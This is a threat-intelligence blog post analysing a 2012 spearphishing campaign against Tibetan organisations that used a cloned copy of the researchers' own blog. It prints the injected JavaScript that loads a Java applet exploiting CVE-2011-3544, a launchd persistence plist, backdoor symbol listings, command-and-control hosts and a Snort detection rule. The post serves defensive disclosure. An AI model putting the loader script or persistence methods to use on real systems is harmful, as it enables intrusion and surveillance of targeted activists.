A few hours ago Greg Walton posted a warning on spearphishing mails sent to non-governmental organizations related to Tibet. The content of these emails is about our previous research Targeted Attacks against Tibetan organizations.
—————Forwarded message—————
From: webmaster <admin@alienvault.com>
Date: Mon, Mar 19, 2012 at 8:20 AM
Subject: Targeted attacks against Tibet organizations
To: ......
We recently detected several targeted attacks against Tibetan activist organizations including the Central
Tibet Administration and International Campaign for Tibet, among others.
Here is one of the emails detected:
[ More information ]
It contains a link to hxxp://dns.assyra.com/ that hosts a copy of our blog post but includes some Javascript:
<script>
var emb = document.createElement(‘applet’);
emb.setAttribute(‘name’, ‘applet’);
emb.setAttribute(‘width’, ‘1’);
emb.setAttribute(‘height’, ‘1’);
emb.setAttribute(‘code’, ‘Func1.class’);
if (navigator.userAgent.indexOf(‘Win’) != -1){
emb.setAttribute('archive', 'default.jar');
}
else if (navigator.userAgent.indexOf(‘Linux’) != -1){
emb.setAttribute('archive', 'index.jar');
}
else if (navigator.userAgent.indexOf(‘Mac’) != -1){
emb.setAttribute('archive', 'index.jar')
}
document.body.appendChild(emb);
</script>
The domain shenhuawg.com is also pointing to that server.
Based on the user-agent (Mac or Windows) it loads a Java applet that exploits CVE-2011-3544.
https://www.virustotal.com/file/d4b394844e8357a15bf6e76cb15db05a8b073b026a813d11e35211bb96caad52/analysis/1332192121/
https://www.virustotal.com/file/13f596019477b51c311f19f9adc2e4f9628ad98df1a55db6c707521ed944ec90/analysis/
The attack contains malware to infect both Windows and MacOSX.
The MacOSX backdoor has 0/0 antivirus detection rate:
https://www.virustotal.com/file/143969e8eaed6269ac6c55e2a861cdde81947e7c45e5d27e939d4bbb1c9ac8cd/analysis/1332184087/
bash-3.2# nm -a file.tmp
U ___error
U ___memcpy_chk
U ___stack_chk_fail
U ___stack_chk_guard
U ___strcat_chk
0000000100000000 A __mh_execute_header
U _alarm
U _close
U _connect
U _creat
U _dup2
U _execl
U _exit
U _fork
U _gethostbyname
U _getpid
U _getpwuid
U _gettimeofday
U _getuid
U _ioctl
U _malloc
U _memcmp
U _memcpy
U _memset
U _open
U _openpty
U _putenv
U _rand
U _read
U _recv
U _select$1050
U _send
U _setsid
U _shutdown
U _signal
U _sleep
U _socket
U _strncpy
U _ttyname
U _waitpid
U _write
U dyld_stub_binder
0000000005614542 - 00 0000 OPT radr://5614542
bash-3.2# otool -L file.tmp
file.tmp:
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 125.2.10)
<?xml version=“1.0” encoding=“UTF-8”?>
<!DOCTYPE plist PUBLIC “-//Apple Computer//DTD PLIST 1.0//EN” “http://www.apple.com/DTDs/PropertyList-1.0.dtd”>
<plist version=“1.0”>
<dict>
<key>Label</key>
<string>com.apple.docserver</string>
<key>Program</key>
<string>
/Library/Audio/Plug-Ins/AudioServer
</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
The trojan connects to the following server:
dns.assyra.com (100.42.217.73)
100.42.208.0 - 100.42.223.255
530 W. 6th St Suite 701
Los Angeles, CA
US
The domain assyra.com has been involved in several attacks during the past using Win32/Protux.
The Windows payload is detected by AVG as BackDoor.Generic15.VKZ
https://www.virustotal.com/file/5513b45a4856f7941d71cf0885380469fdc22ece101d0399baabc9bd8b5536be/analysis/
The Windows payload seems to have been created 6 days ago:
It copies itself to “C:\WINDOWS\system32\2019\svchost .exe” and modifies HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders -> Startup to maintain persistence.
It connects to the following servers:
tibet.zyns.com (100.42.217.73)
100.42.208.0 - 100.42.223.255
530 W. 6th St Suite 701
Los Angeles, CA
US
yahoo.xxuz.com (100.42.217.91)
100.42.208.0 - 100.42.223.255
530 W. 6th St Suite 701
Los Angeles, CA
US
lyle.changeip.org (100.42.217.73)
100.42.208.0 - 100.42.223.255
530 W. 6th St Suite 701
Los Angeles, CA
US
Once it connects to one of the servers (port 8080) , it sends some information about the victim like the ComputerName using some obfuscation:
You can use the following rule to catch this traffic on your network:
alert tcp $HOME_NET any -> $EXTERNAL_NET 8080 (msg:“MALWARE WUpdater checkin”; content:”|3C|html|3E||3C|title|3E|12356|3C||2F|title|3E||3C|body|3E|”; depth:33; classtype:trojan-activity; sid:11111111111111; rev:1;)
We will publish more information about this and ongoing attacks as soon as we have more information. Stay tuned.
Update: There is another sample of BackDoor.Generic15.VKZ (222a150bf0399f23af6d59f695304610) which used 11.36.214.140 as the C&C server. Check your logs!
